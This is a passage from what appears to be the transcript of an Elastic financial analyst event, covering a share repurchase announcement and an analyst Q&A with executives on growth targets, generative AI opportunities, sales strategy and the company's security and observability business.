Finally, and this is new, we will begin returning capital to shareholders through a share repurchase program in order to partially offset dilution. We will do ongoing share repurchases unless more attractive acquisition opportunities become available to us. As part of this capital allocation strategy, I'm pleased to announce that the board has authorized $500 million for an initial program. We expect to use more than 50% of the authorized amount in fiscal 2026. Going forward, we expect to return 50% of our free cash flow through share repurchases, unless more attractive acquisition opportunities arise that require more cash. We are incredibly excited about the opportunity ahead. We have a business supported by a strong land and expand motion. Generative AI presents a dynamic and exciting opportunity for us here at Elastic. Our platform was made for this moment.

Our model supports tremendous leverage, which allows us to grow revenue and expand our margins to Rule of 40 and above. Thank you very much for being here. I want to welcome Eric back to the stage.

Eric Prengel
Global VP of Finance, Elastic

OK. Thank you, everyone. We're going to have a Q&A session in a second while the team sets up the chairs, and we'll get all the people who presented back on stage. The way the Q&A is going to work is: raise your hand, and I'll call on people. When you ask your question, please state your name as well as the firm that you work for. With that, I think we've almost got the chairs on stage. I'll call the team to come back up, please. These guys work fast. By the way, Claire and Chantal will come bring microphones. Go for it. Go ahead. Ittai, you want to go first?

Ittai Kidron
Managing Director and Senior Equity Research Analyst, Oppenheimer

Thank you. Ittai Kidron from Oppenheimer. Thanks for the presentation today. Very helpful. A clarification for you, Navam, and a question for you, Ash. The clarification, Navam: when you talked about the Gen AI contribution to your long-term model, five points, you said you'd gradually grow into it. Does that mean that in the early years here, it will not be 5%, meaning your targeted growth is under 20%, and in time we'll get to 20% just on that? Ash, you made a very compelling presentation today, you and your entire team, around the technology, the differentiation. I always come away very impressed with the technology. When I look at the competitive space, whether it be a Datadog or a Dynatrace, or the security companies like a CrowdStrike, they have all been growing north of 20% for quite some time.

Help me understand: what is it in the model that makes it so difficult to translate the technology into the reality of dollars? I understand that there's a big Gen AI opportunity ahead, and you can always say, talk to me two years from now. But a lot of the advantages have already existed for the last three, four years. What is it that's been missing? How are you addressing that perceived gap between the capability and the reality of what the numbers are?

Ash Kulkarni
CEO, Elastic

Why don't I take the question, the second question first? Maybe that'll lead nicely for Navam to answer the first. The most important thing to understand is what is the role that customers use us for in an enterprise? It's always been around unstructured data. That's been the primary problem that Elastic was always used to solve. We got into search first, and that was the core use case. Search, in the early days, just did not have the same market size and opportunity as maybe structured data and opportunities around it, or even Observability and Security. That led us to go into other areas where unstructured data was a core problem. We got into Observability. We got into Security.

We were methodically building out all of the capabilities that we needed to be a very strong player, a very compelling player, starting with our core strengths, starting with log analytics for Observability and starting with SIEM for Security. We've been on this journey. Keep in mind that when it came to search, that was, in some ways, the smallest part of the business. What has changed for us in every way possible is that unstructured data has become more important than ever before. Our core search business is seeing more interest than we've ever seen in the past. That market, that solution area, is today our fastest growing solution area. That wasn't the case in the past. That's number one.

Second, even when it came to Observability and Security, in the past, although we had the best backend data store to deal with Observability signals, to deal with Security signals, we didn't have anything that we could completely and conclusively come forward with and say, this is why we can solve the problem better, faster, and in a more efficient manner. AI has been that unlock, even in Observability, even in Security. When you see the demos today, if you paid attention to the demos today, what you saw was stuff that matters to Security and SRE practitioners that was not possible before, and more importantly, that others aren't able to do even today. All of that comes from that really amazing advantage that we have from AI.

To me, this is definitely an opportunity for us to continue to improve upon our growth rate, accelerate everything that we are doing, and get well past the 20% mark. That's the goal. That's the history of how we got here. That's the reason why I'm so excited, because effectively, what was always our core strength, Ittai, has now become what the market cares most about.

Navam Welihinda
CFO, Elastic

Let me take that first question, Ittai. I'm glad you asked it. Here's the way you should think about our model. I hope I gave you enough data on the cohorts and the expansion rates, and enough cuts, to show that, look, 15% is a baseline. We expect that to be there just based on continued core execution on things we have, without anything coming from the background and helping us along. That's just the core execution. That's something we want to be solid about, right? Beyond that, there's the tailwind. So it's 15%+, and then there's 5%+. AI is just a very dynamic market. It's going to be progressive as we go into the midterm, which, midterm for me, is from the end of the year, roughly three-ish years, the way I think about it.

This year, we've guided to 15% for the full year. Sales-led subscription revenue is generally about two points higher than that, right? From there, the tailwind grows to a 20%+ target rate, which the framework suggests in the midterm period. That's how I would think about a growing tailwind on the sales-led line, which will end at the 20%+ rate in the framework model that I just talked about. Just to be clear, those AI tailwinds are happening now, and we're confident about those AI tailwinds continuing. The timing, it's a dynamic market. Mapping out the timing exactly, quarter by quarter, is a difficult thing to do.

Koji Ikeda
Director of Enterprise Software Equity Research, Bank of America

Koji Ikeda from Bank of America. Thanks for doing this. Great presentation, guys. Wanted to ask a question maybe related to Ittai's question about budget unlock with the customers. It sounds like the generative AI opportunity is tremendous for you guys. Technology is fantastic. I mean, you talk with any customer out there. Elastic is just very, very well known in the end market. What does it take for the customers to spend more with you guys? Is it just more strategic shots on goal? Mr. Dodds, this question may be directed mostly towards you about what are you doing within the sales organization to really drive more spend over to you guys?

Ash Kulkarni
CEO, Elastic

Maybe I'll touch upon it, and I'll definitely want Mark to elaborate. In a lot of ways, Koji, as you said, the market opportunity has always been there. Part of it has been just the opportunity around AI making search more and more important, which has been a big part of why you see this enthusiasm. You see the cohort data clearly showing how AI is contributing. The other part of this is, you know, when we looked at our segmentation model in the past, there was definite inefficiency in the fact that our sellers weren't really specializing. Our sellers were hybrid sellers, if you will. A lot of the work, a lot of the hard work that we went through at the beginning of FY 2025 in terms of the work that Mark did was to make sure that we could go deeper.

We could go in a more intentional way into accounts, into enterprise accounts to capture a bigger share of the wallet. These deals take time. When you're able to convert a customer over from an incumbent SIEM platform and consolidate them onto Elastic, those deals tend to be very big. One example was the GSA announcement that we made in the public sector. I think it was a quarter ago.

Mark Dodds
Chief Revenue Officer, Elastic

It was in June.

Ash Kulkarni
CEO, Elastic

In June, that is the perfect kind of example of the kinds of opportunities we are now able to go after with the kind of work that Mark's team has done. Mark.

Mark Dodds
Chief Revenue Officer, Elastic

Yeah, I think you said it well. As I mentioned earlier, we've reduced the number of accounts per AE so that they can go deeper with those customers and cross-sell into new buying centers. We're seeing that gaining traction, building pipeline, and getting us into new business. We're also focusing on net new logos with territories and entire teams focused on that. As I mentioned, we're adding more sales capacity. We're getting more at-bats to grow our business.

Mike Cikos
Managing Director of Equity Research, Needham

Hey, thanks again for doing the analyst event. It's Mike Cikos with Needham. Appreciate all the information on the cohorts and the financial model. On the 15-point baseline that we're talking to, it'd be helpful to get a better understanding of the different use cases that are giving you guys that confidence, right? I know we're bulled up on search. We're seeing it at the conference here. I think it was probably five, maybe six consecutive quarters where we were talking about search AI budgets accelerating. It's now been at least a quarter or two since we've gotten that last data point, and we're seeing the growth rates. Can you just help explain that dynamic? The second is more of a tech question. With the Elastic Inference Service, I understand that you guys have the models now being served up on the GPUs.

Previously, was it on the customer to get the chips and then put the model on the chips? What did the customer have to do for that inferencing angle that the EIS offering you're announcing today is now unlocking?

Thank you.

Navam Welihinda
CFO, Elastic

Take that one first, then I'll do the other.

Ash Kulkarni
CEO, Elastic

Why don't I ask Ken to answer the second one?

Ken Exner
Chief Product Officer, Elastic

I'll answer the second question. Previously, if a customer wanted to use our embedding models or re-ranker, they would run them on an ML node within our stack, which would be on a CPU-based architecture. If they wanted to use GPUs, they could, but they would have to direct it towards some other service that they would run themselves or somewhere else. With the Inference Service, we are providing a fully managed, API-accessible inferencing capability that's running on GPUs. It's initially supporting ELSER and embedding models. We're going to expand that to cover re-rankers and the Gen AI models as well. We will be expanding the models that we host on the Inference Service, and it'll all be on GPUs.

Navam Welihinda
CFO, Elastic

I'll take that first question you asked. First of all, I think you've got to think about the core platform growth. There's more and more data coming into the platform, and you've seen the data behind the net retention rates that are 113% and stable. There's data behind each of the cohorts over a long period of time that supports continuing that teens growth rate without much in the way of tailwinds. That's the first point I'd make: outside of search acceleration, outside of all the unlocks that you're seeing on search, just the core platform increase is going to be sustained at 15%+, based on the net retention rates and the cohort data that we see.

In addition to that, when you think about all the great platform announcements, or the Search and Observability announcements, that we made today, that's driving differentiation to allow us to take more market share in a TAM that's still expanding. The Observability and Security businesses are still very large TAMs, and there's still a long way to go there. I think our product differentiation just grew. That's what gives us confidence in that 15%+. It's driven by that core platform and the amount of data coming into the platform, supported by all the cohort data and the net expansion data that you just saw, along with all the product announcements that we talked about in Security and Observability outside of search.

Sanjit Singh
Executive Director, Morgan Stanley

My congrats on all the great data from the presentation as well. Ash, I got a really clear view today of where the company is going, how you're going to win, why you're going to win. One of the most popular questions I get from investors is, why did growth get so low to begin with? Navam, your presentation, I think, speaks to part of that, which is maybe around some of the optimization activity, and there are some good go-to-market changes you guys are making. Is there anything else that could explain the deceleration in growth that we've seen over the last couple of years? Were there headwinds in your Security business or your Observability business that you're now working through?

I think if we put those pieces together, it makes it much easier to underwrite where we're going on a 15%+ growth basis plus Gen AI. Any sort of comments there?

Ash Kulkarni
CEO, Elastic

Yeah, let me address that and then ask Navam to also jump in. Fundamentally, I think there was a chart, I can't remember the exact slide number, that Navam showed that broke down the three components within our revenue. There's sales-led subscription revenue, there's the monthly cloud business, and then there are services. If you look carefully at those three components, they really tell the story, because monthly cloud, which is our SMB business, was a significantly larger and faster-growing component of the business if you went back four or five years. In the last three years, that has clearly been roughly flat. That's not something that just we are seeing; across the board, SMB spending hasn't really come back the way enterprise and other spending has come back.

Services, professional services, we have been very clear that this is not something that we want to grow at the same rate as the business. It's not the most strategic part of what we are trying to do. We are a platform company, a product platform company. The subscription revenue growth that we are trying to drive through the sales-led motion, that's what we care most about. Services is just an enabler. What we really have been laser-focused on in the last three years is making sure that we get that sales-led subscription revenue growing and thriving and continuing to accelerate. That's where the effort has been.

So apart from that dynamic, by solution mix or any other cut, we don't see any issues in terms of competing, winning in the market, continuing to take share. We feel incredibly confident about Observability. We feel incredibly confident about Security. As a matter of fact, we've been beneficiaries when it comes to taking share from incumbents. It is this dynamic of monthly cloud versus the rest of the business. If you take out the monthly, what's left is what we are really focused on. Internally, that's the thing that I care about. Over time, that's going to be a bigger and bigger percentage of our revenue. The rest, frankly, is not going to be what should matter to investors.

Sanjit Singh
Executive Director, Morgan Stanley

Understood.

Navam Welihinda
CFO, Elastic

Nothing more to add. The intent of providing those two charts was to give you the data behind it. Ash summarized it clearly: the change in the SMB dynamic is, not partially but mainly, the reason for the deceleration that you're seeing in those years. The second chart shows the durability of our sales-led subscription revenue growth rate over multiple years. We talked about multiple quarters in the last earnings call, but if you look back, it's been many, many years of strong growth. What we're saying now is that we maintain that durability, 15%+ on the baseline, just with the bread-and-butter stuff that we're doing now without much Gen AI. The Gen AI tailwinds, which we're seeing now, get us beyond that. There's even the potential to breach 20%.

The Gen AI tailwind of 5% is just the math we see on the cohorts that we compare. Some of the data shows an even higher tailwind than 5%.

Sanjit Singh
Executive Director, Morgan Stanley

Understood. On the Security business, kind of following Ittai's question, should investors underwrite market share gains, displacements? I mean, you guys are a product company, and Security is becoming more data-driven, compliance-driven, all that. Do you feel like you have the relationships with the Security ecosystem to displace what are pretty formidable competitors, in the SIEM space in particular? This probably might be a Mark question. I'd just love to get your perspective on that.

Mark Dodds
Chief Revenue Officer, Elastic

Yeah, I'll comment, and maybe Santosh, if you want to add. What we see in the market is that many customers are ready to and want to replace their legacy Security platforms. They're evaluating Elastic, and they put us through our paces. We love that because when customers evaluate us in detail and they see the innovation that we're driving, they see Attack Discovery, Automatic Import, we're winning a high percentage of the time, and we're winning large deals. That's why we have a program around Race to Displace. We're finding a lot of success there, and we're excited about that opportunity.

Eric Prengel
Global VP of Finance, Elastic

Could you just say your name and firm when you're on the microphone?

Rob Owens
Managing Director and Senior Research Analyst, Piper

Sure. Rob Owens from Piper. Hi, guys. Ash, you do have a history in the Security universe if we go back almost a decade now at this point.

Ash Kulkarni
CEO, Elastic

I'm old.

Rob Owens
Managing Director and Senior Research Analyst, Piper

Endpoint has never been purely an efficacy game. While you're showing well in the scores, a lot of the independent scoring, is EDR critical to your success as we think about that convergence of what was XDR into next-generation SIEM, in your view?

Ash Kulkarni
CEO, Elastic

In my view, it's going to be another vector for growth, Rob. The great thing about endpoint telemetry is that it's voluminous, and you can't get away from it. You have to have something on your endpoints to make sure that you have that threat vector covered. Exactly for that reason, the most important thing that we solved a few years ago, and we solved it right, was to make it easy for people to get our agents deployed on their endpoints. The way we did that is by incorporating all of that functionality directly into the same agent that does the collection of data for SIEM. You're already deploying that agent, and once you have it, we go to them and say, hey, it's the easy button. Just turn it on.

Now, you're absolutely right that efficacy isn't the only thing that matters, that there is more that's required. People need to put you through your paces. People need to see that you can be the one single dashboard that they can use for doing all their detections and remediation and so on. Having that data-centric approach and being the SIEM gives us the opportunity to talk to the SOC and say, you're already trusting us for doing all your detections across all threat vectors, not just endpoint, but across everything, because that's what happens in a SIEM. Everything ends up in a SIEM eventually. If you're trusting us for that, why don't you try out the endpoint functionality? It's been this expand play. All through this time, we have been making our endpoint product better and better, adding not just efficacy capabilities, but also management capabilities.

How do we easily deploy? How do we do rolling upgrades? All of those things that, for other vendors, have even caused blue screens of death, as you know. Those things are important to get right, and we've been working hard on them. Over time, I expect this to be a bigger and bigger and more and more interesting area for us for expansion. We're just getting started on it.

Howard Ma
Director and Equity Research Analyst of Software Sector, Guggenheim Securities

Great. Thank you. Howard Ma with Guggenheim Securities. Thanks for a very informative presentation, as well as the balanced profit and growth framework, which is what I want to ask about. If you look at the top line going from about 15% today to, assuming you achieve the aspirational target, 20%+, that's quite positive. But if you look at the free cash flow margin, I know you guys didn't give a discrete guide for this year. I think you might have said, Navam, on the earnings call that it's like high teens. Going from high teens to 20% is not that much expansion.

I wonder, is that because of conservatism, or are you building in investments, specifically on the monthly pay-go side, because you still have to drive the product-led motion and educate your customers that Elastic is the best unified data platform for unstructured data, driving consolidation versus today's siloed approach? I would say those are really the barriers today. The question is how much investment is needed to overcome those potential challenges. Thank you.

Ash Kulkarni
CEO, Elastic

Before Navam answers the question on the free cash flow model, I just want to clarify the inherent leverage in the model. I want to make sure that people understand that one of the advantages of having a single platform on which Search, Observability, and Security are all built is that our cost of engineering, our cost of building this platform, is incredibly efficient. We don't have to build three different management consoles. We don't have to build three different ways to manage users and user profiles and so on. There is tremendous leverage that we get from having one single platform. That applies also to our monthly cloud business. It is important to understand that our monthly cloud business isn't an expense drag on the business. It is something that tempers the top line because it's been flat.

It doesn't affect our cost profile in any negative way. With that, let me hand it over.

Navam Welihinda
CFO, Elastic

Yeah, let me start on the OpEx side, just to build on what Ash said. I think we broke out what we expect R&D, sales and marketing, and G&A to do in the midterm model on the operating expense side. We expect to keep strong investments going into R&D and keep that line stable. On the sales and marketing line, I think we've shown the amount of leverage we can drive. In 2026, we are investing in capacity. We're doing a really good job on the productivity improvements, and we're seeing all the good things that are happening in the field. We want to double down on that and build some capacity there. 2026 is a build year.

After the build year in 2026, you're going to see progressive improvements in sales and marketing as a percentage of revenue, and similarly on the G&A side as a percentage of revenue. We should think of this as a build year; after that, we're going to get back on the margin trajectory. Remember what I talked about with capital allocation: we still want to invest to win the market and make sure that we're positioning ourselves to win. At the same time, we're going to be very disciplined. On the free cash flow side, the model is to get to Rule of 40+ under the target scenario of a 15%+ baseline plus an upwards-of-5% tailwind. In any scenario, we are going to get to Rule of 40+. Obviously, the growth components of the 20%+ are that baseline plus those tailwind growth rates.

This year, our FCF margin is expected to be roughly the same as last year.

Tyler Radke
Managing Director and Senior Equity Research Analyst, Citi

Yeah, Tyler Radke from Citi. Thanks for doing this. I thought the framing of Elastic as kind of the leading unstructured data platform definitely resonated across all the different presentations. I guess my question is, as we think about the ways in which AI is changing how you can productize that, I'd love to get your thoughts. I mean, this Agent Builder that you demoed seemed pretty compelling. You're seeing a lot of newer vendors offer almost out-of-the-box solutions, whether it's on the search side, the Gleans of the world. You're seeing vibe coding products probably leverage a lot of the core Elastic functionality. How do you think about all the trends in the developer space around automation and AI driving more usage of Elastic over time? What are you doing from a product perspective? And a second question for Navam.

You raised the guide like six weeks after you reported. What have you seen over the last six weeks? Was this just strength on consumption? Was it bookings on the federal side? Any elaboration on what's driving that confidence?

Ash Kulkarni
CEO, Elastic

Maybe let me just touch upon the first one in terms of monetization. At the end of the day, our fundamental model for monetization is consumption, as you know, Tyler. Everything that we do is designed to both give value to our customers in what they are trying to achieve and, at the same time, drive consumption on the platform. That is effectively how we are going to grow. Take the announcements that you heard today, whether it's the Elastic Inference Service or the new models from Jina that will become part of that Inference Service. All of those are compute intensive. Our use as a vector database, when somebody is building the retrieval system for context engineering to build any kind of agent, is a significant contributor to consumption.

Agent Builder, the way you should think about it, is going to fast-track the process by which somebody actually builds these kinds of end applications. That's the key. We don't have a business-user UI, but that's because, at the end of the day, the people who work best and fastest with Elastic are developers. Unlike some of these other companies that you mentioned, we have huge mind share with the developer community. Tapping into that developer community, which is massive and is building applications that are used by enterprises, by every user within the enterprise, is, we feel, a much more efficient and much faster way to really get penetration. What Agent Builder lets us do is fast-track the path for an end user to actually build these kinds of applications. That is key.

I don't know if you want to add anything to that.

Ken Exner
Chief Product Officer, Elastic

Just to expand on one thing you said: our approach has always been to allow people to drop down to the platform, drop down to code, and have the flexibility to do whatever they want. With a lot of the other solutions out there, if it can't do what you want, you're stuck. You want to go customize something? You can't. If the product doesn't support it, you can't do it. We never leave our developers stuck. They can always drop down. They can always customize. We try to make it very easy to get started by providing an abstraction. You saw it in Agent Builder: we create an agent automatically by default, and we create some tools automatically by default. You can go in, customize, and extend. That's in our ethos; it's something we do.

We also approach this from a data point of view. Unlike anyone else, we start with the data. We're trying to give you access to building tools and building agents on top of your data. We look at this as you want to chat with your data. You want to build an agent on top of your data. You have private data. How do you expose that to an agent? How do you expose that to an LLM? That's the point of view we always take. Others tend to start with the hosting platform or something else. We start with the data and try to figure out how to help a customer expose that data and build generative AI applications on top of that data.

Navam Welihinda
CFO, Elastic

Yeah, on the guidance side, commitments are strong. That's what gave us the confidence to raise the year. That's the first thing. We're also further along in the quarter, so we wanted to give you an update on the quarter as well. On the government shutdown, there will obviously be no business conducted in October, since there's no one there at the federal government. Overall, the government is going to open up at some point, and our products are positioned very well for when that happens. In fact, we had several good contracts before the government shut down as well. We're not worried about the U.S. public sector business over the medium term; it's just that October is obviously going to be impacted by the shutdown. Overall, commitments are very strong. That's the reason for the update.

Eric Prengel
Global VP of Finance, Elastic

We're going to do one last question. It's going to be Raimo.

Raimo Lenschow
Managing Director, Barclays

Thanks for squeezing me in. No pressure on the question quality, I guess. Thank you, and thanks from me as well, a great event. Maybe one for Mark to get him back on. As a sales leader, if you look at the number of customers that only have one product compared to where it should be, that's kind of a huge upside. The question is, why is that number so low? I'm sure you guys have looked at it. Is it kind of the wrong customer? Or is there a lot more you can do there? That feels way too low as a ratio. Thank you.

Mark Dodds
Chief Revenue Officer, Elastic

Yeah, it's a great question. We believe there's a lot of upside there. We looked at how we were covering our customers in the past. First of all, we weren't aligning our sales capacity to the largest opportunities. We had territories that had way too many accounts, a combination of existing accounts and white space accounts. The sellers didn't have the time to focus, get deeper with customers, and focus on going to the next solution within the customer. That is why we made a lot of the changes that we made. We're seeing progress on that already. We see that as tremendous upside going forward.

Ash Kulkarni
CEO, Elastic

You know, that was the last question. All I would say is hopefully some of you, or if not most of you, had the opportunity to come earlier during the day and see the complete presentations. This event, our Elastic{ON} event, is always something that we care a lot about because this is one of the greatest and best opportunities for our customers to learn from us, but also from each other. You had the opportunity to participate in the Financial Analyst Day. Hopefully, you were able to get some energy and some ability to talk to customers who are here, get more insights into how they are adopting our platform, hear about some of their success stories with us, hear about why they are excited about what we are doing. We are really, really excited about what the future holds for us.

Just in terms of the business overall, the commitments that we are seeing from customers, the demand that we are seeing in the market, the opportunity to take more share as we consolidate onto our platform, the needs that customers have around Observability, Security, and so on. Most importantly, how we can differentiate with AI, how we can capture this wave. I am very confident that AI is going to be the dominant technology for at least the next several decades. If that's the case, then you have to imagine that more and more applications are going to be built on this LLM-based paradigm. We want to be the context engineering platform that every single one of those applications uses. That's our mission. That's our vision. That's why we are so excited about the future. Thank you again. I believe there's a cocktail hour for the entire event.

You are all very welcome to join. Thank you very much.
